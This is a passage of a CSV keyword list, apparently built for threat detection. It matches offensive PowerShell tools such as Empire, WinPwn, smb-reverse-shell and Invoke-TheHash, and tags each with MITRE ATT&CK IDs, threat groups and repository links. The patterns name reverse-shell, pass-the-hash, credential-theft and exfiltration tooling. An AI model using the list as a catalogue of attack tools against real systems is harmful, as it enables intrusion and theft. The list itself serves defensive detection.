-ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SmbObey *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbObey.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbOrder *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbOrder.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 
- TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SMBRemoting.ps1*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Invoke-SMBRemoting-main*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SocksProxy *","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-SocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-SocksProxy.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLAudit*","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLOSCmd 
-Instance * -Command *","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red 
teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invokestealthuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-StealthUserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - 
T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan 
- APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-TheHash*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.ps1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.psd1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheHash.psm1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 